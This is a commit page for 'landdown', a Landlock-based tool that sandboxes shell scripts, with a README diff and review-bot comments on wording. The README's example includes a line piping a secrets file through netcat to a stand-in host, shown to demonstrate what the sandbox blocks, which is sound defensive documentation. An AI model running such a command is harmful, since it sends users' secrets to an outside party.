landdown
Simple Sandboxing for shell scripts.
git clone git://mccd.space/landdown
commit 02dfbe6622c0a5f189390fcdd96e9e34048ba6e6
parent 37a2ebb69d67f34176e0c5b5ff4c1e7a5d876e8a
Author: Marc <marc@coquand.email>
Date: Thu, 2 Apr 2026 21:21:59 +0200

README

Diffstat:
M README.md | 16 +++++++++-------
1 file changed, 9 insertions(+), 7 deletions(-) diff --git a/README.md b/README.md @@ -1,6 +1,6 @@ # Landdown - Simple shell script sandbox -An ergonomic Linux utility for sandboxing shell scripts using [landlock](https://landlock.io). In particular, it aims to protect you against the security impacts of bugs or unexpected/malicious behavior. To use, prepend your script with landdown and allow list. For example: +Landdown is a easy-to-use utility for Linux that allows you to sandbox shell scripts using [landlock](https://landlock.io). Just like Landlock, Landdown "aims to protect you against the security impacts of bugs or unexpected/malicious behavior". To use, prepend your script with a landdown shebang and a ruleset. For example: ```sh #!/usr/bin/env landdown @@ -9,19 +9,19 @@ ro /lib #!/bin/sh # Following works echo "Hi" -# The following fails +# Following fails cat $HOME/my-secrets | nc exploit.com 1337 ``` -landdown locks down file and network access of a script to those explicitly listed in the allowlist. +Landdown locks down file and network access of a script based on rules explicitly listed in the allowlist. The syntax is: ``` #!/usr/bin/env landdown -rules... -#!/interpreter -script content... +<rules...> +#!<interpreter> +<script content...> ``` ## Supported rules @@ -46,7 +46,7 @@ go install git.sr.ht/~marcc/landdown@latest ## Examples -### Edit a file +### Access a file ```sh #!/usr/bin/env landdown @@ -76,4 +76,6 @@ curl https://www.google.com Try removing `ro /etc/ssl`, `rof /etc/resolv.conf`, or `connect 443` and it should fail. Network access needs to be explicitly set. +## See also +- **sh**(1) - section on ulimit
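Review bot: In the first hunk (@@ -1,6 +1,6 @@) the new opening sentence reads "a easy-to-use utility", which should be "an easy-to-use utility". The same added line writes the name as "landlock" in the link text and "Landlock" in the following sentence; use one capitalization. Since the sentence now quotes Landlock's own wording, it would help to make clear that the quotation comes from the linked landlock.io page.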
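Review bot: In the second hunk (@@ -9,19 +9,19 @@) the comment "# Following fails" does not say why the command fails, and the line under it does two things at once: it reads `$HOME/my-secrets` and it opens a connection to port 1337. A reader cannot tell whether the file read, the connect, or both are denied by the ruleset shown. Suggest naming the missing rule or rules in the comment, or splitting the example into one file-access failure and one network failure. In the syntax block of the same hunk, `#!<interpreter>` can be read literally; add a sentence stating that the angle brackets mark placeholders and are not typed.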
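Review bot: In the last hunk (@@ -76,4 +76,6 @@) the new "See also" entry points at the ulimit section of sh(1) without saying what it is for. The README text visible in this diff describes file and network rules only, so add a short phrase saying that ulimit is suggested for resource limits alongside landdown, if that is the intent. A reference to landlock(7) would also fit in this list, since the README presents landdown as built on Landlock.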